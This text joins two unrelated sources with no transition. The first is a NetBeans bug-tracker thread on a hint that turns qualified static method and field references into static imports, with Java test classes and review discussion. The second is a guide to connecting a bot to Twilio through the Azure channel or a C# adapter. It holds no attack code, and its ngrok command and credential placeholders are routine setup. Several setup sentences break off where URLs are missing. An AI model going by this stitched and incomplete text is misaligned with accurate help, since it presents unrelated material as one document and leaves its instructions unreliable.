I'm attaching a patch in a moment which implements the hint to convert Klass.staticMethod -> staticMethod, i.e. point 4 in my previous post. Try it out on the Test code at the end of this update. This hint is intended only to convert qualified accesses of static methods to static imports; it is not intended to work if the containing class is not already imported/resolved. Either this hint could offer to do the import of the containing class, or that support should be added to the error hints. My preference would be with the latter... and that will be the next thing I'll look at. There will obviously be a lot of code duplication, so I'll aim to move a lot of this functionality into somewhere accessible by both.

I have several comments and questions:
- how can I discover if the current source level supports static imports?
- how can I discover if the MethodInvocationTree or ExpressionTree is actually resolved (i.e. their containing class is imported)... I'd like to exit if not, because that should be a job for the error hints.
- is there a better way to discover if a static method is being accessed in a qualified way?
The current technique of calling .contains(".") on the ExpressionTree.toString seems really hacky.
- is it OK to assume the form of ImportTree.getQualifiedIdentifier().toString()? The form is not documented, but I found other NB code doing similarly.
- do java.hints run() methods really have to start with a treePath.getLeaf().getKind() sanity check? Shouldn't we be able to trust the framework to only send us TreePaths that we ask for in getTreeKinds()?
- related to previous; is a similar sanity check also required after calling the TreePathHandle.resolve?
- JavaFixAllImports.addImports doesn't support static imports. Also, it is directly copied from SourceUtils.addImports! I can't see how to upgrade this code to support static imports... meaning I'll be forced to introduce further code duplication. Anyone have any alternatives?

========
public class Test {

    public Test(String blah) {
        int abs = Math.abs(1);
        Test.doStuff();
        Calendar.getInstance();
    }

    public static void doStuff() { }
}

Created attachment 80550 [details] first attempt

I'd like to NetFIX [1] this bug. Is it possible? [1]

Some notes to the patch:

> // XXX is this sanity check needed?
Yes it is. The resolver is not 100%.

> // TODO ignore case where source code is less than Java 1.5
We're preparing a method added to CompilationInfo.

> // XXX can't use JavaFixAllImports.addImports because no support for static imports
> // XXX smart insertion
We have to find a better way to do this. Ideally, make SourceUtils.addImports public and make it work with this. I'll give this a try soon.
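For readers following along, the conversion being discussed (Klass.staticMethod -> staticMethod, point 4 above) amounts to the following. Demo is a made-up class for illustration, not part of any attached patch; both forms compile and behave identically once the static import is present:

```java
import static java.lang.Math.abs;

public class Demo {

    // Before the hint runs: a qualified static method call.
    int before() {
        return Math.abs(-5);
    }

    // After the hint runs: the call is unqualified, and
    // "import static java.lang.Math.abs;" has been added at the top.
    int after() {
        return abs(-5);
    }
}
```

Note that the qualified form still works after the static import is added, which is why the hint is purely cosmetic and safe to apply call-by-call.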
I was hoping you'd say that about SourceUtils.addImports ;-)

The following is a good test bed for the "hint" part of this feature:

====================
import java.util.logging.Logger;
import javax.crypto.KeyAgreement;
import static java.util.Calendar.*;

public class Test {

    public Test(String blah) throws Exception {
        // should only change identifier, no import DONE
        int abs = Math.abs(1);
        // should only change identifier, no import DONE
        Test.getLogger();
        // should not offer to do static import (name clash with local) DONE
        Logger.getLogger("");
        // should not offer to do static import (unresolved) XXX
        EnumSet.of(null);
        // should not offer to do static import (name clash with existing static import) XXX
        KeyAgreement.getInstance("");
    }

    public static void getLogger() { }
}

Created attachment 80898 [details] improvements in "pure hint", no handling errors

I considered many more scenarios and the following is the latest test bed. Again, this hint is not intended to work as an "error hint"; that will be dealt with separately. In the meantime... anyone know how to exit early if the identifier is not resolved?
=========================
import java.util.Calendar;
import java.util.Collections;
import java.util.logging.Logger;
import javax.crypto.KeyAgreement;
import static java.util.Calendar.*;

public class Test extends Foo {

    public Test(String blah) throws Exception {
        // should only change identifier, no import DONE
        int abs = Math.abs(1);
        // should only change identifier, no import DONE
        Test.getLogger();
        // should only change identifier, no import DONE
        Foo.foo();
        // should only change identifier, no import DONE
        Calendar.getAvailableLocales();
        // should change identifier and import DONE
        Collections.emptyList();
        // should not offer a static import, name clash with local DONE
        Logger.getLogger("");
        // should not offer a static import, name clash with imported DONE
        KeyAgreement.getInstance("");
        // should not offer a static import, name clash with inherited DONE
        Bar.foo();
        // should not offer a static import, unresolved XXX
        EnumSet.of(null);
    }

    public static void getLogger() { }
}

class Foo {
    static protected void foo() { }
}

class Bar {
    static protected void foo() { }
}

Created attachment 80899 [details] hack to ignore error cases

Created attachment 80922 [details] consider inner classes, addStaticImport in SourceUtils

My last test bed post was a bit of a "brain fart", please ignore... this class is a much better test bed as it tests behaviour for inner/static classes. For me, patch 4 behaves as expected where you see DONE, but I need to do a full recompile to confirm as I'm getting odd compile errors in java.source (not my fault!).
========================
import java.util.Calendar;
import java.util.Collections;
import java.util.logging.Logger;
import javax.crypto.KeyAgreement;
import static java.util.Calendar.*;

public class Test extends Foo {

    void doStuff() throws Exception {
        // should change identifier and import DONE
        Math.abs(1);
        Collections.emptySet();
        // should only change identifier, no import DONE
        Test.getLogger();
        // should only change identifier, no import DONE
        Foo.foo();
        // should only change identifier, no import DONE
        Calendar.getAvailableLocales();
        // should not offer a static import, name clash with local DONE
        Logger.getLogger("");
        // should not offer a static import, name clash with inherited DONE
        Bar.foo();
        // should not offer a static import, name clash with imported DONE
        KeyAgreement.getInstance("");
        // should not offer a static import, unresolved DONE
        EnumSet.of(null);
    }

    public static void getLogger() { }
}

Grr... typo in last patch: line 115 of StaticImport.java should have reversed logic, i.e.

if (!isSubTypeOrInnerOfSubType(info, klass, enclosingEl)) {

Apologies. Since it was only a beta patch, I'll not upload a correction just yet. Also, aesthetic, but the variable 'isStatic' in SourceUtils is better described as being called 'ignore'.

Created attachment 81017 [details] integrated with the error hinter and considered more use cases

Latest patch now integrates with the error hinter, yay! I still need a way to detect the source version >= 1.5.
I have an outstanding query on the mailing list which should clear up the METHOD_SELECT issue in ImportClass, see MEMBER_SELECT-not-a-MemberSelectTree--tt23266103.html

Next step is to convert the following test file into a series of unit tests; then I think I'll create a separate issue for improvements to the completer:

==================
import java.util.Calendar;
import java.util.logging.Logger;
import javax.crypto.KeyAgreement;
import static java.util.Calendar.*;

/**
 * @author Sam Halliday
 * @see <a href="">issue 89258</a>
 */
public class Test extends Foo {

    void doStuff() throws Exception {
        // should change identifier and import DONE
        Math.abs(1);
        // should only change identifier, no import DONE
        Test.getLogger();
        // should only change identifier, no import DONE
        Foo.foo();
        // should only change identifier, no import DONE
        Calendar.getAvailableLocales();
        Calendar.getInstance();
        // should not offer a static import, name clash with local DONE
        Logger.getLogger("");
        // should not offer a static import, name clash with inherited DONE
        Bar.foo();
        // should not offer a static import, name clash with imported DONE
        KeyAgreement.getInstance("");
        // hint should not offer a static import, unresolved DONE
        // error hint should offer a static import DONE
        Collections.emptySet();
        // hint should not offer a static import, unresolved DONE
        // error hint should not offer a static import, local name clash DONE
        EnumSet.of();
        // hint should not offer a static import, unresolved DONE
        // error hint should not offer a static import, imported name clash DONE
        MessageDigest.getInstance("SHA");
        // hint should not offer a static import, unresolved DONE
        // error hint should not offer a static import, target doesn't exist XXX
        Collections.doesNotExist();
    }

    public static void getLogger() { }

    public static void of() { }
}

@jlahoda I'm going to keep working on this despite the feature freeze.
Just to let you know I'm not expecting 6.7 inclusion ;-)

Created attachment 81414 [details] started creating unit tests

Created attachment 81437 [details] added test cases, ready for review

I'm very happy with the latest patch upload. It now has extensive test coverage. I realise 6.7 is now closed for new RFEs, so I won't push for inclusion... but it is sitting here ready for integration ;-)

A few quick comments:

1. // XXX is this sanity check needed? (for Tree.Kind in the run method of the hint) - this is actually not needed at runtime, but the computeErrors method in TreeRuleTestBase can generally be called for any TreePath (esp. for the four generic tests defined in TRTB). If computeErrors verifies the Tree.Kind, the check is not needed in the hint.

2. I am not much in favor of making the SourceUtils.addImports method(s) public. The main reason is that I do not see any client for these methods aside from java.source, java.editor and java.hints. And, if the method is there, other clients may be tempted to use these methods instead of the proper TreeMaker.Type/QualIdent (making the code worse to maintain throughout the IDE). IIRC, this was the main concern before 6.0; maybe not so important now (clients learned the advantages of TM.Type/QualIdent), but it should still be considered.

3. There is usually no need to keep compatibility inside the implementation packages (JavaFixAllImports.addImports); simply fixing all uses should be enough.

I will try to go through the patch more deeply soon. What about the other features, btw?

Created attachment 81548 [details] same as last, but bump up revision number in file name

@jlahoda I think you were looking at an older version of the patch... sorry, I got a little carried away with updates to this page; a lot of questions appear unanswered, but I got responses from the mailing list if not here.
I also noticed that I didn't change the name of the latest patch to indicate that it was the latest; please look at java.hints-static_import-7.diff only.

I created a separate issue 164487 for the Java Completer part of this RFE as it is much more involved. That would provide a UI to allow users to manually specify classes that can be statically imported. Implementing this will involve pulling some helper methods from java.hints into java.{source, editor}. I created a separate issue 89258 for full classpath search for static methods. Admittedly, this is what the OP was asking for; I should really have created a separate RFE for the hint part, but it wasn't clear what the dependency chain looked like until work began. Sorry @gsporar if you've felt spammed, but we are closer to a solution than when you submitted the RFE ;-)

Issue 122109 tracks the reordering of static imports.

Re: SourceUtils.addImports, I have no strong feelings one way or the other, but somebody recommended making it public and the code duplication in java.editor was concerning. Is there a way to turn this into a maintainable API method? Honzo, can you comment on this? Thanks!

The non-error hint part of this was added to the "contrib" branch in the following commit. Users should be able to use the build by adding the following UNSTABLE Update Center.

I'd like to see the support in this patch (and in contrib) extended to handle members, not just methods.

Any update on this Honzo? Thanks!

*** Issue 174782 has been marked as a duplicate of this issue. ***

*** Issue 66669 has been marked as a duplicate of this issue. ***

(arriving here from #174782) Nice duplicate. We are now almost 100,000 bug reports later, and this issue is not yet resolved. Seems to be almost useless to submit P3 bug reports. Make it P2 to give it more visibility.

While we wait for this patch to be accepted in the main NetBeans source, there is an Experimental Hint giving this support.
Please feel free to add the following plugin to your NetBeans Tools -> Plugins -> Settings list; it will give you access to the "Java Experimental Hints" plugins, providing some time-saving features. None of the plugins will be enabled by default. As well as enabling "Static Imports", I also recommend "Serializable".

Sam, if you agree, I will put the hint from contrib into the standard NetBeans distribution. Regarding the error fix (i.e. on an unresolvable method/field), I still think this should be done primarily in ComputeImports, so that all import-related features could benefit from it. Also, I still think that the hint should be able to work without any user customization (such customization may be optional, but should not be required, IMO). But maybe bug #164490/#71249 was supposed to cover this?

@jlahoda thanks! Re: error handling, please feel free to look at some of the older patches against main to see how I was intending this to be implemented - it should save you some time. I will not be offended if you do what you feel is best. Re: other issues - that was exactly the point of creating them :-)

I have moved the StaticImport hint to the standard distribution. I have removed it from contrib. As there are other bugs (bug #164487, bug #71249) for the other features needed to support static import, I think we can close this one.

Thanks a lot Honzo, and more importantly thanks Sam for your patch!

Integrated into 'main-golden', will be available in build *200912100200* on (upload may still be in progress).
Changeset:
User: Jan Lahoda <jlahoda@netbeans.org>
Log: #89258: Sam Halliday's (fommil@netbeans.org) hint for conversion of qualified static method reference to import static and unqualified reference moved from contrib to trunk.

Hi, I really like this feature, except that it doesn't import static fields. In fact, for the code I'm working on now I'd prefer a hint for static fields but not for the methods. Is this still valid in 7.
Created attachment 147920 [details]
Patch: introducing support for static imports for fields/enum fields.

Please review the patch and commit. The patch introduces support for transforming static (enum) field references to use static imports. The patch also includes unit tests with obvious examples.

Patch applied. Thanks for your contribution.

Thank you Dusan and Benno!

Can this be modified to exclude references to the static "class" variable? I just tried to run this, and I'm using the class objects fairly thoroughly, and this check suggested "import static java.lang.String.class" AND "import static java.lang.Double.class".

(In reply to ruckc from comment #59)
> Can this be modified to exclude references to the static "class" variable?
> I just tried to run this, and I'm using the class objects fairly thoroughly,
> and this check suggested "import static java.lang.String.class" AND "import
> static java.lang.Double.class".

I created a follow-up issue for this RFE.
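The fields/enum-fields patch extends the same rewrite to static field references. A hypothetical sketch of the two cases it covers - a plain static field and an enum constant (again, the class and method names here are invented for illustration):

```java
// Static field and enum-constant references rewritten to use static imports.
import static java.lang.Math.PI;
import static java.util.concurrent.TimeUnit.SECONDS;

public class StaticFieldImportDemo {

    // Static field reference; was: 2 * Math.PI * radius
    static double circumference(double radius) {
        return 2 * PI * radius;
    }

    // Enum constant reference; was: TimeUnit.SECONDS.toMillis(2)
    static long twoSecondsInMillis() {
        return SECONDS.toMillis(2);
    }
}
```

Note how the enum case imports a single constant (`TimeUnit.SECONDS`), not the whole enum type - which is why the `.class` suggestion reported above is a corner case the hint needs to exclude.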
Connect a bot to Twilio

You can configure your bot to communicate with people using the Twilio cloud communication platform.

Log in to or create a Twilio account for sending and receiving SMS messages

If you don't have a Twilio account, create a new account.

Create a TwiML Application

Create a TwiML application following the instructions. Under Properties, enter a FRIENDLY NAME. In this tutorial we use "My TwiML app" as an example. The REQUEST URL under Voice can be left empty. Under Messaging, the Request URL should be.

Select or add a phone number

Follow the instructions here to add a verified caller ID via the console site. After you finish, you will see your verified number in Active Numbers under Manage Numbers.

Specify the application to use for Voice and Messaging

Click the number and go to Configure. Under both Voice and Messaging, set CONFIGURE WITH to TwiML App and set TWIML APP to My TwiML app. After you finish, click Save. Go back to Manage Numbers; you will see that the configuration of both Voice and Messaging has changed to TwiML App.

Gather credentials

Go back to the console homepage; you will see your Account SID and Auth Token on the project dashboard, as shown below.

Submit credentials

In a separate window, return to the Bot Framework site at.

- Select My bots and choose the bot that you want to connect to Twilio. This will direct you to the Azure portal.
- Select Channels under Bot Management. Click the Twilio (SMS) icon.
- Enter the Phone Number, Account SID, and Auth Token you recorded earlier. After you finish, click Save.

When you have completed these steps, your bot will be successfully configured to communicate with users using Twilio.

Connect a bot to Twilio using the Twilio adapter

As well as the channel available in the Azure Bot Service to connect your bot with Twilio, you can also use the Twilio adapter. In this article you will learn how to connect a bot to Twilio using the adapter.
This article will walk you through modifying the EchoBot sample to connect it to Twilio.

Note: The instructions below cover the C# implementation of the Twilio adapter. For instructions on using the JS adapter, part of the BotKit libraries, see the BotKit Twilio documentation.

Prerequisites

- A Twilio account. If you do not have a Twilio account, you can create one here.

Get a Twilio number and gather account credentials

Log into Twilio. On the right hand side of the page you will see the ACCOUNT SID and AUTH TOKEN for your account; make a note of these, as you will need them later when configuring your bot application.

Choose Programmable Voice from the options under Get Started with Twilio. On the next page, click the Get your first Twilio number button. A pop-up window will show you a new number, which you can accept by clicking Choose this number (alternatively, you can search for a different number by following the on-screen instructions).

Once you have chosen your number, make a note of it, as you will need it when configuring your bot application in a later step.

Wiring up the Twilio adapter in your bot

Now that you have your Twilio number and account credentials, you need to configure your bot application.

Install the Twilio adapter NuGet package

Add the Microsoft.Bot.Builder.Adapters.Twilio NuGet package. For more information on using NuGet, see Install and manage packages in Visual Studio.

Create a Twilio adapter class

Create a new class that inherits from the TwilioAdapter class. This class will act as our adapter for the Twilio channel and include error handling capabilities (similar to the BotFrameworkAdapterWithErrorHandler class already in the sample, used for handling other requests from Azure Bot Service).
public class TwilioAdapterWithErrorHandler : TwilioAdapter
{
    // The constructor and OnTurnError handler were elided in this extract;
    // follow the pattern of the BotFrameworkAdapterWithErrorHandler class
    // already present in the sample.
}

Create a new controller for handling Twilio requests

Create a new controller which will handle requests from Twilio, on a new endpoint 'api/twilio' instead of the default 'api/messages' used for requests from Azure Bot Service channels. By adding an additional endpoint to your bot, you can accept requests from Bot Service channels, as well as from Twilio, using the same bot.

[Route("api/twilio")]
[ApiController]
public class TwilioController : ControllerBase
{
    private readonly TwilioAdapter _adapter;
    private readonly IBot _bot;

    public TwilioController(TwilioAdapter adapter, IBot bot)
    {
        _adapter = adapter;
        _bot = bot;
    }

    [HttpPost]
    [HttpGet]
    public async Task PostAsync()
    {
        // Delegate the processing of the HTTP POST to the adapter.
        // The adapter will invoke the bot.
        await _adapter.ProcessAsync(Request, Response, _bot, default);
    }
}

Inject the Twilio adapter in your bot startup.cs

Add the following line to the ConfigureServices method within your startup.cs file. This will register your Twilio adapter and make it available for your new controller class. The configuration settings you added in the previous step will be used automatically by the adapter.

services.AddSingleton<TwilioAdapter, TwilioAdapterWithErrorHandler>();

Once added, your ConfigureServices method should contain the following registrations (only these lines survived in this extract; the method's other registrations are unchanged from the sample):

// Create the Twilio Adapter
services.AddSingleton<TwilioAdapter, TwilioAdapterWithErrorHandler>();

// Create the bot as a transient. In this case the ASP Controller is expecting an IBot.
services.AddTransient<IBot, EchoBot>();

Obtain a URL for your bot

Now that you have wired up the adapter in your bot project, you need to identify the correct endpoint to provide to Twilio in order to ensure your bot receives messages. You also require this URL to complete the configuration of your bot application.

To complete this step, deploy your bot to Azure and make a note of the URL of your deployed bot.
Note: If you are not ready to deploy your bot to Azure, or wish to debug your bot when using the Twilio adapter, you can use a tunneling tool such as ngrok to expose your locally running bot (the command below assumes your local bot is running on port 3978; alter the port numbers in the command if your bot is not).

ngrok.exe http 3978 -host-header="localhost:3978"

Add Twilio app settings to your bot's configuration file

Add the settings shown below to your appSettings.json file in your bot project. You populate TwilioNumber, TwilioAccountSid and TwilioAuthToken using the values you gathered when creating your Twilio number. TwilioValidationUrl should be your bot's URL plus the api/twilio endpoint you specified in your newly created controller.

"TwilioNumber": "",
"TwilioAccountSid": "",
"TwilioAuthToken": "",
"TwilioValidationUrl": ""

Once you have populated the settings above, you should redeploy (or restart, if running locally with ngrok) your bot.

Complete the configuration of your Twilio number

The final step is to configure your new Twilio number's messaging endpoint, to ensure your bot receives messages.

- Navigate to the Twilio Active Numbers page.
- Click the phone number you created in the earlier step.
- Within the Messaging section, complete the A MESSAGE COMES IN section by choosing Webhook from the drop-down and populating the text box with the bot endpoint that you used for the TwilioValidationUrl setting in the previous step.
- Click the Save button.

Test your bot with the adapter in Twilio

You can now test whether your bot is connected to Twilio correctly by sending an SMS message to your Twilio number. Once the message is received by your bot, it will send a message back to you, echoing the text from your message.

You can also test this feature using the sample bot for the Twilio adapter by populating the appSettings.json with the same values described in the steps above.
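A note on why TwilioValidationUrl must match the public webhook URL exactly: Twilio signs every webhook request with an HMAC-SHA1 signature (sent in the X-Twilio-Signature header) computed over the full request URL concatenated with the POST parameters in sorted-key order, keyed with your auth token, and the receiving side recomputes it to reject forged requests. The sketch below illustrates Twilio's published signing scheme in Java for clarity; it is not the adapter's actual implementation, and the class name is invented:

```java
import java.nio.charset.StandardCharsets;
import java.util.Base64;
import java.util.Map;
import java.util.TreeMap;
import javax.crypto.Mac;
import javax.crypto.spec.SecretKeySpec;

public class TwilioSignature {

    // Recompute Twilio's X-Twilio-Signature for a webhook request:
    // Base64(HMAC-SHA1(authToken, url + each POST key and value, sorted by key)).
    public static String compute(String authToken, String url, Map<String, String> postParams) {
        try {
            StringBuilder data = new StringBuilder(url);
            // TreeMap iterates its keys in sorted order, as the scheme requires.
            new TreeMap<>(postParams).forEach((k, v) -> data.append(k).append(v));

            Mac mac = Mac.getInstance("HmacSHA1");
            mac.init(new SecretKeySpec(authToken.getBytes(StandardCharsets.UTF_8), "HmacSHA1"));
            byte[] digest = mac.doFinal(data.toString().getBytes(StandardCharsets.UTF_8));
            return Base64.getEncoder().encodeToString(digest);
        } catch (Exception e) {
            throw new IllegalStateException("HmacSHA1 unavailable or key invalid", e);
        }
    }
}
```

If the URL the bot validates against differs from the URL Twilio actually signed (http vs. https, or a missing path segment such as /api/twilio), the recomputed signature will not match and the request is rejected - which is why the setting must mirror the webhook URL configured in the Twilio console.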